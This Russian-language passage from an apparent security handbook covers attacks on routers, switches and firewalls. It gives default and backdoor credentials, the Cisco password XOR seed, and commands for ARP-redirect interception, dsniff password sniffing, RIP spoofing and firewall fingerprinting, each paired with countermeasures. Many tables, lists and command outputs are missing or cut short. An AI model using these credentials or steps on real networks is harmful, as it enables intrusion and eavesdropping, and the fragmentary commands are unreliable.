перечислены все основные разработчики сетевых устройств и строки доступа, используемые ими по умолчанию для чтения и для чтения/записи. Таблица 10.2. Используемые по умолчанию пароли сетевых устройств
Помимо перечисленных строк доступа, используемых по умолчанию, многие компании в качестве таковых используют собственное название. Например, руководствуясь этим принципом, издательство Osborne может использовать в качестве строки доступа слово osborne (но это только по секрету). |
"Потайные" ходы "Тайная" учетная запись (backdoor account) — это одна из наиболее сложных проблем. Такие учетные записи создаются разработчиками для того, чтобы при отладке обходить случайно заблокированные учетные записи администраторов, однако гораздо чаще они предоставляют злоумышленникам возможность проникновения в вашу систему. В последние годы было выявлено немало таких встроенных пользовательских имен и паролей, позволяющих получить доступ ко многим популярным сетевым устройствам, включая 3Com, Bay, Cisco и Shiva. Суть проблемы заключается в том, чтобы найти все подобные устройства и запретить или ограничить к ним доступ. |
Установленные по умолчанию учетные записи Одним из чаще всего обнаруживаемых изъянов является установленные по умолчанию имя пользователя и пароль. Практически все разработчики поставляют на рынок сетевые устройства, позволяющие получить с помощью подобной учетной записи доступ на уровне пользователя, а иногда — и администратора (подробнее см. табл. 10.3). Поэтому вашим первым шагом при настройке таких устройств должно быть немедленное удаление таких учетных записей. Таблица 10.3. Стандартные пользовательские имена и пароли, которые необходимо изменить
Коммутаторы 3Com Коммутаторы 3Com очень часто имеют несколько встроенных по умолчанию учетных записей с разным уровнем привилегий — admin, read, write, debug, test и monitor. Если эти встроенные учетные записи окажутся незащищенными, то с их помощью злоумышленник сможет получить пользовательские или даже административные привилегии. Контрмеры: защита встроенных учетных записей коммутаторов 3Com Для того чтобы изменить пароль, введите с консоли устройства команду system password. Маршрутизаторы Bay Маршрутизаторы Bay имеют пару установленных по умолчанию учетных записей, некоторые из которых к тому же по умолчанию не защищены паролем. Поскольку при настройке операционной системы удобно пользоваться учетными записями User и Manager, в которых пароль отсутствует, то довольно часто администраторы оставляют эти учетные записи незащищенными. Это позволяет злоумышленнику с помощью утилиты telnet получить прямой доступ к устройству и через FTP переписать на свой компьютер конфигурационные файлы. Например, на многих коммутаторах Bay 350T имеется учетная запись NetiCs без пароля, которая представляет собой прекрасный "потайной ход" в систему. Контрмеры: защита встроенных учетных записей маршрутизаторов Bay
Пароли маршрутизаторов Cisco На разных моделях Cisco неоднократно обнаруживали различные пароли, используемые по умолчанию для доступа с виртуального терминала vty, включая такие легко угадываемые, как cisco и cisco routers. Кроме того, на некоторых моделях были обнаружены установленные по умолчанию пароли cisco, позволяющие получить удаленный доступ к устройству. Как вы понимаете, такие пароли нужно как можно быстрее заменить на более сложные. Наконец, на некоторых моделях Cisco 2600, произведенных до 24 апреля 1998 года, по умолчанию использовался пароль, состоящий из одной-единственной буквы с. Контрмеры: защита маршрутизаторов Cisco Даже если вы измените все обнаруженные легко угадываемые пароли, установленные производителем по умолчанию, это вовсе не означает, что ваше устройство Cisco надежно защищено. Поскольку компания Cisco не применяет мощных алгоритмов шифрования паролей, используемых для доступа с терминалов vty, то, обнаружив их тем или иным способом, злоумышленник сможет без труда взломать эти пароли. Несмотря на это, каждый владелец маршрутизатора Cisco должен как можно скорее выполнить следующие операции.
Устройства Webramp Джеймс Игелхоф (James Egelhof) и Джон Стенли (John Stanley) установили, что устройства Webramp Entre (в версии ISDN) имеют установленные по умолчанию пользовательское имя wradmin и пароль trancell. Эта учетная запись предоставляет злоумышленнику доступ к устройству на уровне администратора, позволяя вносить изменения в конфигурацию, изменять пароль и т.д. Вполне вероятно, что подобные недостатки имеются и в других продуктах Webramp. Контрмеры: защита устройств Webramp В данном случае самый простой метод защиты заключается в изменении административного пароля. Более сложное решение, предложенное Игелхофом и Стенли, заключается в ограничении доступа с использованием службы telnet через порт WAN. Это можно осуществить несколькими способами, однако мы можем порекомендовать следующий. Находясь в среде программного обеспечения устройства Webramp включите режим Visible Computer для каждого активного модемного порта и направьте его на ложный IP-адрес, например, на немаршрутизируемый адрес, такой как 192.168.100.100. После этого отключите оба режима Divert Incoming. Подключение к кабельному модему Motorola через порт 1024 с помощью telnet Как сообщалось в майском выпуске (1998 г.) бюллетеня Bugtraq, программное обеспечение Cable Router компании Motorola позволяет кому угодно подключиться к скрытому порту telnet. Как выяснилось, с портом TCP 1024 связан ожидающий поступления запросов демон telnet, и, используя установленные по умолчанию пользовательское имя cablecom и пароль router, через эту службу можно получить административный доступ к этому устройству. Хотя на практике кабельные модемы от компании Motorola встречаются нечасто, авторы оставили описание этого изъяна, поскольку он наглядно демонстрирует возможность проникновения в систему через такие "неожиданные" порты, как TCP 1024. Не допускает ли ваш модем скрытый доступ через службу telnet к какому-либо другому порту? |
Устранение изъянов Возможность хакинга сетевых устройств в значительной степени зависит от объема и качества проведенных в сети защитных мероприятий. Если вы выбрали пароли для подключений telnet и строки доступа SNMP, которые трудно подобрать, ограничили использование служб FTP и TFTP, а также активизировали режим регистрации всех событий, имеющих отношение к безопасности (при условии, конечно, что кто-то регулярно просматривает эти журналы), то описанные ниже изъяны вряд ли окажутся опасными для вашей сети. С другой стороны, если ваша сеть достаточно обширна и имеет сложную для управления структуру, в ней могут оказаться узлы, безопасность которых, мягко говоря, далека от идеальной. В связи с этим нелишним будет выполнить дополнительную проверку и лишний раз застраховаться от неожиданностей. Устаревшая база данных MIB Cisco и Ascend Устройства компаний Cisco и Ascend поддерживают базу данных MIB устаревшего формата, которая через открытые строки доступа, обеспечивающие чтение и запись, позволяет любому пользователю получить конфигурационный файл с использованием TFTP. Если речь идет об устройствах Cisco, то эта база данных называется OLD-CISCO-SYS-MIB. Ввиду того что в этом файле содержится пароль для доступа к устройству Cisco (он зашифрован весьма примитивным способом — с помощью операции XOR), взломщик может легко расшифровать его и использовать для реконфигурации вашего маршрутизатора или коммутатора.
Получив конфигурационный файл, остается лишь расшифровать пароль. Для этого достаточно щелкнуть на кнопке Decrypt Password панели инструментов, как показано на рис. 10.5.
Если же вы хотите проверить, является ли ваше устройство уязвимым, не прибегая к "хакерским методам", то можно воспользоваться базой данных Cisco, находящейся по адресу ftp://ftp.cisco.com/pub/mibs/supportlists/. Найдите свое устройство и перепишите на свой компьютер файл supportlist.txt. Затем вам остается проверить, поддерживается ли этим устройством база данных MIB старого формата, т.е. OLD-CISCO-SYS-MIB. Если это так, то вам придется принимать дополнительные меры по защите маршрутизатора. line vty 0 4 Для того чтобы загрузить конфигурационный файл устройств Ascend, также можно воспользоваться командой snmpset следующего вида. snmpset 10.11.12.13 private
Контрмеры: защита базы данных MIB Обнаружение Самый простой способ обнаружения SNMP-запросов на запись в базу данных MIB заключается в использовании утилиты syslog, настроенной на регистрацию каждого запроса. Для этого сначала на компьютере с системой UNIX или NT нужно запустить демон syslog, а затем настроить его таким образом, чтобы он регистрировал соответствующие события. На устройстве Cisco это можно сделать с помощью следующей команды. logging 196.254.92.83 Защита Для того чтобы воспрепятствовать злоумышленнику получить старую базу MIB, можно предпринять следующие меры.
Слабость алгоритмов шифрования паролей Cisco Устройства Cisco, по крайней мере на момент написания данной книги, имели слабый алгоритм шифрования, используемый как при хранении пароля vty, так и пароля доступа. Оба пароля хранятся в конфигурационном файле устройств, а их взлом не представляет особого труда. Для того чтобы узнать, является ли ваш маршрутизатор уязвимым, просмотрите конфигурационный файл с помощью следующей команды. line vty 0 4 Слабость встроенного алгоритма шифрования Cisco объясняется тем, что он основан на использовании операции XOR и постоянного инициализирующего значения (seed value). Шифруемые пароли Cisco могут иметь до 11 алфавитно-цифровых символов разного регистра. Первые два байта пароля выбираются случайным образом из диапазона от 0x0 до 0xF, а оставшиеся представляют собой строку, полученную путем объединения с помощью операции XOR пароля и заданного блока символов dsfd;kfoA,.iyewrkldJKDHSUB. Модуль расшифровки паролей Cisco компании SolarWinds Для тех, кто лучше знаком с системой Windows, существует соответствующая версия модуля расшифровки паролей Cisco, подготовленная компанией SolarWinds из города Тулса штата Оклахома (Tulsa, Oklahoma). Компания SolarWinds разрабатывает сетевое программное обеспечение для больших телекоммуникационных компаний и включает модуль расшифровки в состав приложения просмотра параметров настройки устройств Cisco (Cisco Config Viewer). Кроме того, этот модуль распространяется и как самостоятельное приложение (рис. 10.6).
Контрмеры: защита паролей Cisco Единственным решением проблемы защиты пароля доступа (enable password) является использование для изменения пароля команды enable secret. Эта команда защищает пароль доступа с помощью алгоритма шифрования MD5, для которого пока что нет известных методов быстрого взлома. К сожалению, остальные пароли Cisco, такие как пароли доступа vty, защитить ни этим, ни каким-либо другим методом нельзя. Получение файлов с помощью TRP Практически все маршрутизаторы поддерживают использование протокола TFTP (Trivial File Transfer Protocol). Этот протокол представляет собой основанный на протоколе UDP механизм передачи файлов, применяемый для резервного копирования и восстановления конфигурационных файлов, который связан с портом UDP 69. Как вы понимаете, обнаружить эту службу, запущенную на вашем устройстве, достаточно просто с помощью утилиты nmap. [root@happy] tftp Если ваш маршрутизатор уязвим, то в текущем каталоге вашего компьютера вы наверняка найдете конфигурационный файл (lax-serial-rtr.cfg) маршрутизатора. В нем, скорее всего, будут содержаться все строки доступа SNMP, а также списки управления доступом. Более подробная информация о том, как использовать TFTP для получения информации об устройствах Cisco, находится в архиве группы Packet Storm. Контрмеры: защита от применения ТFTР Для того чтобы устранить угрозу, таящуюся в использовании протокола TFTP, можно предпринять следующие меры.
Конфигурационные файлы устройств компании Bay Программное обеспечение управления сетью компании Bay Networks, диспетчер Site Manager, позволяет администраторам выполнять тестирование состояния сети, включая проверку SNMP-статуса устройства и установление факта его работоспособности с помощью пакетов IСМР. К сожалению, конфигурационные файлы .cfg, предназначенные для хранения параметров Site Manager, хранятся в незашифрованном виде. Помимо прочего, в этом файле хранятся также строки доступа SNMP. Если злоумышленнику удастся проникнуть на компьютер, работающий под управлением Site Manager, все, что ему нужно сделать, — это скопировать конфигурационные файлы в свою версию Site Manager и найти в них информацию о строках доступа SNMP. Контрмеры: защита конфигурационных файлов Вау Самая простая защитная мера заключается в ограничении списка пользователей. которым разрешено копировать конфигурационные файлы. Для этого достаточно разрешить чтение этих файлов только суперпользователю root (или только администратору, отвечающему за настройку маршрутизатора). |
Множественный доступ и коммутация пакетов Общая передающая среда (как Ethernet, так и Token Ring) применяется для обмена данными в сетях на протяжении более двух десятков лет. Этот подход был разработан Бобом Меткафом (Bob Metcalfe) для стандарта Ethernet в исследовательском центре компании Xerox, расположенном в г. Пало Альто (PARC — Palo Alto Research Center), и получил название CSMA/CD (выявление множественного доступа к линии/распознавание конфликтов — Carrier Sense Multiple Access/Collision Detection). При такой традиционной топологии сетевой адаптер Ethernet отправляет исходящий поток данных каждому узлу сегмента. С одной стороны, это гарантирует, что принимающий адаптер, где бы он ни находился, получит, как и все остальные адаптеры сети, предназначавшиеся ему данные (хотя остальным сетевым адаптерам они вовсе не нужны). С другой стороны, постоянно рассылаемые по всей сети пакеты мешают друг другу и при повышении интенсивности работы могут возникать ситуации, когда пропускная способность канала не соответствует интенсивности передаваемых по нему данных. Кроме того, с точки зрения безопасности, множественный доступ к передающей среде — это "бомба замедленного действия", которая рано или поздно может привести к нарушениям безопасности. Однако, к сожалению, сети Ethernet с множественным доступом весьма распространены в настоящее время и. похоже, вряд ли исчезнут в обозримом будущем. |
Определение типа сети Определить, к какому типу относится используемая вами сеть (т.е. к сетям с множественным доступом или же к сетям с коммутацией пакетов), очень просто. Используя простейшую программу перехвата пакетов, например tcpdump (для NT или UNIX), вы получите все данные, необходимые для того, чтобы сделать однозначное заключение. 20:20:22.530205 0:80:24:53:ae:bd > В то же время в сетях с множественным доступом к передающей среде вы увидите все типы данных, пересылаемых по сети разными узлами. Например, в показанном ниже фрагменте сеанса работы утилиты tcpdump, легко обнаружить потоки данных, предназначенные другим компьютерам (естественно, такого рода информация гораздо интереснее для злоумышленников, чем приведенная выше). 20:25:37.640205 192.168.40.66.23 > |
Пароли на блюдечке: dsniff Конечно, с помощью утилиты tcpdump можно без проблем определить тип используемой сети, однако что вы скажете о получении главных жемчужин компьютерного мира — паролей? Для этих целей можно приобрести чудовищный по предоставляемым возможностям программный пакет SnifferPro или воспользоваться более дешевыми средствами, например, CaptureNet, разработанным Лаврентием Никулой (Laurentiu Nicula). Однако лучше всего прибегнуть к программе Дага Сонга (Dug Song). Он разработал одно из наиболее сложных средств перехвата паролей — программу dsniff. [root@mybox dsniff-1.8] dsniff Кроме средства перехвата паролей dsnif f, в состав пакета входят разнообразные средства поиска других слабых мест, такие как mailsnarf и webspy. mailsnarf представляет собой небольшое приложение, позволяющее собирать все почтовые сообщения и отображать их содержимое на экране, как если они были написаны вами лично, webspy — это мощная утилита, которая окажется полезной, если требуется определить, какие страницы в Web посетили пользователи. При этом в Web-броузере автоматически будут отображаться Web-страницы, которые были просмотрены определенным пользователем. [root]# mailsnarf Чтение почтовых сообщений ваших соседей может показаться забавным занятием, однако не забывайте о том, что подобные действия вряд ли можно назвать законными.
Контрмеры: защита от dsniff Традиционным способом защиты от перехвата незашифрованных паролей является переход от сетевой топологии Ethernet с множественным доступом к сети с коммутацией пакетов. Однако как вы узнали из предыдущих разделов, такая мера практически не способна предотвратить атаки с применением программы dsniff. |
Анализ пакетов на коммутаторе сети На первый взгляд кажется, что для повышения скорости и уровня безопасности можно просто добавить в сеть новый коммутатор. Если вы считаете, что это позволит удержать любознательных пользователей от прослушивания интенсивного сетевого трафика, то такая позиция может вызвать лишь улыбку. Неужели вы думаете, что новый коммутатор способен разрешить все существующие проблемы? Подумайте хорошенько еще раз. Перенаправление ARP В рассматриваемом примере три компьютера соединены с сетевым коммутатором. Система crush является шлюзом, заданным по умолчанию, с IP-адресом 10.1.1.1. Компьютер shadow— это исходный узел с IP-адресом 10.1.1.18. Система twister представляет собой компьютер взломщика, который будет выполнять роль "третьего-среднего". Его IP-адрес 10.1.1.19. Для подготовки нападения на узле twister запустим утилиту arpredirect, входящую в состав пакета dsniff Дага Сонга. Эта утилита позволит нам перехватывать пакеты, передаваемые исходным узлом по сети другому узлу, который обычно представляет собой шлюз, используемый по умолчанию. Перед тем как приступить к изучению этого подхода в собственной сети, обсудите этот вопрос с сетевым администратором. Если на вашем коммутаторе включен режим защиты портов, то это может привести к блокированию всех пользователей, обратившихся к нему. Не забывайте о том, что все компьютеры соединены с коммутатором и у нас имеется возможность просматривать лишь широковещательный сетевой трафик. Однако как показано ниже, с помощью утилиты arpredirect мы сможем просмотреть весь поток сообщений, передаваемый между узлами shadow и crush. [twister] ping crush
[twister] arpredirect -t 10.1.1.18 10.1.1.1 После выполнения этой команды весь поток сообщений, передаваемый с узла shadow на используемый по умолчанию шлюз crush, будет перенаправляться на компьютер взломщика, twister. На этом узле необходимо также включить режим последующей передачи IP-пакетов (forwarding IP traffic), чтобы он функционировал в качестве маршрутизатора и после перехвата сообщений с узла shadow перенаправлял их на узел crush. На компьютере twister режим передачи пакетов можно активизировать на уровне ядра, однако делать этого не рекомендуется, поскольку в этом случае могут передаваться также пакеты ICMP, что может привести к нарушению всего процесса. Вместо этого воспользуемся утилитой fragrouter (http://www.anzen.com/ research/nidsbench/fragrouter.html) и активизируем обычный режим передачи IP-пакетов с помощью следующей команды. [twister] fragrouter -Bl И наконец, на узле twister нужно активизировать простую программу анализа пакетов, чтобы иметь возможность перехватывать все ценные данные. Для получения более подробной информации об анализаторах сетевых пакетов читайте главы 6 и 8. [twister] linsniff Теперь посмотрим, что же произойдет. После запуска утилиты arpredirect узел twister будет передавать фальшивые ARP-ответы узлу shadow и выдавать себя за узел crush. Узел shadow успешно обновит свою таблицу ARP и поместит в нее "новый" физический адрес узла crush. После этого пользователь компьютера shadow начнет сеанс FTP и POP с узлом 192.168.20.20. Однако вместо передачи пакетов на компьютер crush, реальный используемый по умолчанию шлюз, узел shadow будет введен в заблуждение, поскольку в его таблицу ARP были внесены соответствующие изменения. Через узел twister весь трафик будет перенаправляться на узел 192.168.20. 20, поскольку с помощью утилиты fragrouter мы активизировали режим перенаправления IP-пакетов. Другими словами, узел twister будет играть роль маршрутизатора. [twister] arpredirect 10.1.1.1 Нетрудно догадаться, что в сети с интенсивным трафиком это приведет к настоящему хаосу. Контрмеры: предотвращение перенаправленияАВР Как вы увидели в предыдущем разделе, не составляет никаких проблем генерировать ложные ответы ARP и модифицировать таблицу ARP на большинстве узлов локальной сети. Где это только возможно, задавайте статические записи таблицы ARP, особенно на важных системах. Стандартный прием заключается в задании статических записей АКР, определяющих взаимодействие брандмауэра и пограничных маршрутизаторов. Это можно реализовать следующим образом. [shadow] arp -s crush 00:00:С5:74:ЕА:ВО Обратите внимание на флаг PERM, который является признаком статической записи ARP. May 21 12:28:49 crush: flip Поскольку подобную деятельность выявить не очень легко, то такой мониторинг будет полезен при ее идентификации. snmpsniff Если ваш компьютер находится в сегменте сети с множественным доступом, то совсем неплохо ее "прослушать" и узнать, что же в ней происходит. Воспользуйтесь мощным анализатором пакетов SnifferPro компании Network Associates или запустите утилиту snmpsnif f, разработанную Нуно Леитао (Nuno Leitao, nuno.leitao@convex.pt). а затем посмотрите, какую информацию вы получили. [root@kramer snmpsniff-0.9b]# ./snmpsniff.sh Как видно из приведенного выше фрагмента, злоумышленнику удалось узнать одну из строк доступа (secret), которая может оказаться строкой доступа, позволяющей не только получать, но и записывать данные на маршрутизатор 172.31.50.2 с помощью SNMP. Теперь злоумышленник сможет получить доступ не только к устройствам вашей сети, но и попробовать взломать еще одну "жертву" — компьютер с IP-адресом 172.31.50.100. Контрмеры: защита трафика ЗММР Одна из защитных мер, позволяющих предотвратить перехват трафика SNMP, заключается в его шифровании. В обоих версиях этого протокола, SNMP\2 и SNMPvS, имеется возможность применения алгоритмов шифрования и стандарта DES для шифрования конфиденциальной информации. Альтернативный подход заключается в реализации защищенного канала на базе частной виртуальной сети (VPN — Virtual Private Network). При использовании клиентского программного обеспечения VPN, разработанного компанией Entrust (http://www.entrust.com) или компанией NortelNetworks (http://www.nortelnetworks.com), гарантируется шифрование трафика между клиентским узлом и концом канала VPN. Ложные пакеты RIP После успешной идентификации маршрутизаторов вашей сети, опытный взломщик наверняка предпримет попытку найти те из них, которые поддерживают протокол маршрутизации RIP (Routing Information Protocol) версии 1 (RFC 1058) или 2 (RFC 1723). Почему? Дело в том, что с его помощью легко сгенерировать ложные пакеты. Объясняется это следующими причинами.
В результате взломщик может просто отправить маршрутизатору RIP ложные пакеты и указать, чтобы пакеты передавались в другую сеть или узел, а не на требуемый узел. Вот как можно осуществить атаку с помощью ложных пакетов RIP.
3. Определите наилучшее направление атаки. Тип атаки ограничивается лишь фантазией взломщика, однако в данном примере мы перенаправим весь трафик на определенный узел через наш собственный компьютер, чтобы можно было проанализировать все пакеты и, не исключено, извлечь из них информацию о паролях. Для этого на маршрутизатор RIP (192.168.51.102) необходимо добавить следующий маршрут. Утилита fragrouter 6. Установите свой любимый анализатор пакетов для системы Linux (например, программу dsnif f), а затем приступите к просмотру "на лету" имен пользователей и паролей. Контрмеры: защита от ложных пакетов RIP
|
Резюме В этой главе вы узнали, как много сетевых устройств можно выявить с помощью методов сканирования и прослеживания маршрутов. Идентифицировать эти устройства достаточно легко. Обычно этот процесс сопровождается сбором идентификационных маркеров, идентификацией операционной системы и идентификацией по характерным признакам, например по открытому порту 1999 устройств Cisco. |
Глава 11. БРАНДМАУЭРЫ
|
Брандмауэры С тех пор как Чесвик (Cheswick) и Белоувин (Bellovin) написали свой фундаментальный труд о построении брандмауэров и борьбе с коварным хакером Берфердом (Berferd), желание подключить Web-сервер (или любой другой компьютер) к Internet без развертывания брандмауэра считается самоубийством. Примерно то же можно сказать в ситуации, когда функции брандмауэра возлагаются на переносной компьютер сетевого администратора. Хотя таким опытным специалистам должны быть хорошо известны технические нюансы реализации брандмауэра, как правило, они совершенно не заботятся об обеспечении безопасности и не учитывают цели и средства коварных хакеров. В результате брандмауэры могут оказаться неправильно сконфигурированными, что позволяет взломщикам проникнуть в вашу сеть и послужить причиной далеко не самых лучших ощущений. |
Основные сведения На современном рынке преобладает два типа брандмауэров: программные посредники (application proxy) и шлюзы фильтрации пакетов (packet filtering gateways). Хотя программные посредники считаются более надежными, чем шлюзы фильтрации пакетов, их ограниченность и невысокая производительность обуславливают их применение в основном к исходящему трафику, а не к входящему потоку сообщений, поступающему на Web-серверы многих компаний. В то же время, шлюзы фильтрации пакетов или более сложные шлюзы с сохранением состояния (stateful) можно найти во многих крупных организациях, в которых высокие требования предъявляются к исходящему трафику. |
Идентификация брандмауэров Почти каждый брандмауэр имеет свои отличительные особенности. Поэтому с помощью сканирования портов, инвентаризации и сбора идентификационных маркеров взломщики могут правильно определить тип, версию и набор правил практически каждого брандмауэра в сети. Почему так важна подобная идентификация? Как только вся эта информация будет получена, взломщик может приступать к ее анализу, поиску уязвимых мест и дальнейшему их использованию. Прямое сканирование Самый простой способ поиска брандмауэров заключается в сканировании определенных портов, используемых ими по умолчанию. Некоторые современные брандмауэры можно уникально идентифицировать, выполнив простое сканирование портов. Для этого необходимо лишь знать, что именно вы хотите найти. Например, брандмауэры Firewall-1 компании Checkpoint ожидают поступления запросов с TCP-портов 256, 257 и 258, a Proxy Server компании Microsoft обычно прослушивает TCP-порты с номерами 1080 и 1745. Обладая такой информацией, поиск этих типов брандмауэров окажется тривиальным, если воспользоваться сканером портов, таким как утилита nmap. Контрмеры: защита от прямого сканирования Способы предотвращения сканирования портов брандмауэра во многом совпадают с методами, рассмотренными в главе 2. Необходимо заблокировать попытки такого сканирования на пограничном маршрутизаторе или воспользоваться одним из средств выявления вторжений (свободно распространяемым или коммерческим). Однако и в этом случае нельзя предотвратить простое сканирование портов, поскольку по умолчанию большинство систем IDS не позволяет обнаружить подобную деятельность. Так что перед их использованием необходимо выполнить соответствующую настройку. Обнаружение Для того чтобы безошибочно обнаружить факт сканирования портов по случайному закону или с применением ложных узлов, нужно тонко настроить соответствующую сигнатуру. Для получения дополнительной информации по этому вопросу внимательно изучите документацию, входящую в комплект поставки используемой системы IDS. Предотвращение Для того чтобы предотвратить сканирование портов брандмауэра из Internet, нужно заблокировать эти порты на маршрутизаторе, расположенном перед брандмауэром. Если эти устройства управляются вашим провайдером услуг Internet, то этот вопрос придется согласовать с ним. Если же вы самостоятельно управляете маршрутизатором, то для явного блокирования попыток сканирования воспользуйтесь следующим списком ACL компании Cisco. access-list 101 deny tcp any any eq 256 log! Если вы заблокируете порты Checkpoint (256-258) на пограничных маршрутизаторах, то не сможете управлять брандмауэром по Internet. Администратор Cisco может без особых проблем применить вышеперечисленные правила. Нужно просто перейти в режим редактирования параметров и ввести по очереди предыдущие строки. После этого необходимо выйти из режима редактирования и ввести команду write, чтобы внесенные изменения были внесены в конфигурационный файл. Кроме того, на всех маршрутизаторах в любом случае должно быть задано правило очистки (если они не препятствуют поступлению пакетов по умолчанию), которое имеет тот же смысл, что и приведенная ниже операция. access-list 101 deny ip any any log!
Отслеживание маршрута Более скрытый и изощренный метод поиска брандмауэров в сети заключается в использовании утилиты traceroute. Для поиска каждого сегмента пути к целевому узлу можно воспользоваться утилитой traceroute системы UNIX или аналогичной утилитой tracert.exe системы NT. Затем на основании полученной информации можно сделать некоторые логические предположения. В версии утилиты traceroute из системы Linux имеется параметр -I, при указании которого для поиска сегментов будут посылаться пакеты ICMP, а не UDP-пакеты, используемые по умолчанию. [sm]$ traceroute -I 192.168.51.100 Особого внимания заслуживает сегмент, предшествующий целевому узлу (10. 55.202 .1). Почти наверняка по этому адресу находится брандмауэр, однако для полной уверенности в этом необходимо выполнить некоторые дополнительные исследования. 1 stoneface (192.168.10.33) 12.640 ms 8.367 ms
Контрмеры: защита от отслеживания маршрута Для того чтобы предотвратить получение информации с помощью утилиты traceroute, запретите передачу ответных пакетов на пакеты с истекшим временем TTL на всех брандмауэрах и маршрутизаторах, на которых это возможно. Однако помните о том, что полностью решить этот вопрос можно далеко не всегда, поскольку многие маршрутизаторы могут оказаться под управлениям вашего провайдера услуг Internet. Обнаружение Попытки получения маршрутов с использованием стандартных средств можно выявить на границах сети в процессе мониторинга ICMP- и UDP-пакетов со значением TTL, равным 1. Это можно осуществить с помощью пакета RealSecure 3.0, выбрав имя TRACE_ ROUTE среди параметров безопасности Security Events политики Network Engine Policy. Предотвращение Для того чтобы предотвратить возможность отслеживания маршрутов на границе сети, маршрутизаторы необходимо настроить таким образом, чтобы они не отправляли пакеты в ответ на сообщения с временем TTL, равным 0 или 1. На маршрутизаторах Cisco для этого можно воспользоваться следующим списком ACL. access-list 101 deny ip any any 11 0 ! Время ttl истекло Сбор маркеров Сканирование портов позволяет определить местоположение брандмауэров, однако многие из них, подобно продуктам компаний Checkpoint и Microsoft, не прослушивают порты, установленные по умолчанию. Так что для подтверждения имеющихся сведений требуется получить дополнительные данные. В главе 3 подробно рассматривались методы получения имен запущенных приложений и их версий. Для этого необходимо подключиться к активным службам и извлечь связанные с ними идентификационные маркеры. Многие популярные брандмауэры предоставляют всю необходимую информацию сразу же после установки с ними соединения. Многие промежуточные узлы информируют злоумышленника о том, что они являются брандмауэрами, а некоторые из них дополнительно сообщают свой тип, а также версию. Например, при подключении с помощью утилиты netcat к порту 21 (FTP) узла, который, очевидно, является брандмауэром, можно получить некоторую важную информацию. C:\>nc -v -n 192.168.51.129 21 Сообщение Secure Gateway FTP server ready позволяет сделать вывод о том, что мы имеем дело со старым устройством Eagle Raptor. Последующее подключение к порту 23 (telnet) предоставляет еще одно доказательство этого предположения. C:\>nc -v -n 192.168.51.129 23 И наконец, если вы все еще не совсем уверены в том, что исследуемый узел является брандмауэром, можно подключиться с помощью утилиты netcat к порту 25 (SMTP). После этого все сомнения рассеются окончательно. C:\>nc -v -n 192.168.51.129 25 Как видно из приведенных примеров, в процессе идентификации брандмауэров чрезвычайно важной может оказаться информация о маркерах. После ее анализа можно воспользоваться хорошо известными изъянами или широко распространенными ошибками в настройке. Контрмеры: защита от сбора маркеров Для того чтобы избежать утечки информации, необходимо ограничить количество данных, предоставляемых по внешним запросам. К каждому маркеру можно добавить также сообщение о юридической ответственности, а, кроме того, все попытки получения этой информации должны регистрироваться в системных журналах. Специфика изменения маркеров, используемых по умолчанию, сильно зависит от типа используемого брандмауэра, так что перед выполнением подобных действий внимательно прочтите документацию или проконсультируйтесь с производителем. Предотвращение Для того чтобы предотвратить возможность сбора маркеров злоумышленником и, как следствие, получение им подробной информации о брандмауэре, можно изменить соответствующие конфигурационные файлы. Конкретные рекомендации зависят от типа брандмауэра. Например, для брандмауэров Eagle Raptor можно модифицировать маркеры FTP и telnet, изменив файлы сообщений с событиями дня (message-of-the day) ftp.motd и telnet.motd. |
Дополнительное исследование брандмауэров Если прямое сканирование портов, отслеживание маршрутов и сбор маркеров не принесли успеха, взломщики могут прибегнуть к дополнительной инвентаризации брандмауэра на более высоком уровне. При этом идентифицировать брандмауэры и получить их правила ACL можно в процессе исследования цели и анализа полученной информации (или не полученной). Простой способ получения данных с помощью утилиты nmар Утилита nmар является прекрасным средством исследования брандмауэров, и мы постоянно ею пользуемся. В процессе сканирования узла эта утилита сообщает не только об открытых или закрытых портах, но и о тех из них, которые оказались заблокированными. При этом полученные (или отсутствующие) данные позволяют узнать о конфигурации брандмауэра много важной информации.
При выполнении любого из этих трех условий утилита nmap сообщит о порте как о фильтруемом (filtered). Например, при сканировании узла www.company.com мы получили два IСМР-пакета, что говорит о блокировании брандмауэром портов 23 и 111. [root]# nmap -p20,21,23,53,80,111 -PO -w 192.168.51.100 Состояние Firewalled из предыдущего фрагмента свидетельствует о получении 1СМР-пакета типа 3 с кодом 13 (admin prohibited filter), как видно из следующего листинга утилиты tcpdump. 23:14:01.229743 10.55.2.1 > 172.29.11.207: icmp: host 172.32.12.4 Каким же образом утилите nmap удается связать получаемые пакеты с исходными сообщениями, особенно, когда они являются лишь малой частью данных, передаваемых по сети? Дело в том, что в ответном ICMP-пакете, передаваемом на сканирующий узел, содержится вся информация, необходимая для понимания того, что же произошло. О блокировании порта сообщается в однобайтовом блоке заголовка IСМР по адресу 0x41, а в случае обращения к фильтруемому порту брандмауэр отправит сообщение в IP-блоке пакета по адресу 0xlb (4 байта). [root]# nmap -sS -pl-300 172.18.20.55 При отслеживании пакетов с помощью утилиты tcpdump можно увидеть, что обратно возвращаются пакеты RST/ACK. 21:26:22.742482 172.18.20.55.258 > 172.29.11.207.39667: S
Контрмеры против применения утилиты nmар Обнаружение Для выявления попыток сканирования с использованием утилиты nmap можно применять подходы, описанные в главе 2. Кроме того, можно также дать следующий совет. Настройте процедуру обнаружения сканирования таким образом, чтобы отдельно получать информацию о попытках сканирования брандмауэров. Предотвращение Для того чтобы предотвратить возможность инвентаризации списков ACL маршрутизаторов и брандмауэров, нужно отключить на них режим передачи ответных сообщений ICMP с типом 13. На маршрутизаторах Cisco это можно осуществить, запретив передачу ответных IP-сообщений о недостижимости цели. no ip unreachables Идентификация портов Некоторые брандмауэры имеют уникальные характеристики, отличающие их от других брандмауэров и представленные в виде последовательности цифр. Например, такую последовательность можно получить при подключении к TCP-порту 257 (SNMP) брандмауэров Checkpoint. Наличие портов 256-259 является хорошим признаком брандмауэра Firewall-1 компании Checkpoint. А следующий тест поможет в этом удостовериться. [root]# nc -v -n 192.168.51.1 257
Контрмеры: защита от идентификации портов Обнаружение Факт подключения злоумышленника к портам можно выявить, добавив аудит соответствующего события в программе RealSecure. Вот что для этого нужно сделать. Предотвращение Возможность подключения к TCP-порту можно предотвратить, заблокировав его на маршрутизаторе исходящих сообщений. Следующий простой список ACL брандмауэров Cisco поможет явно запретить все попытки подключения. access-list 101 deny tcp any any eq 257 log ! Блокирование сканирования Firewall-1 |
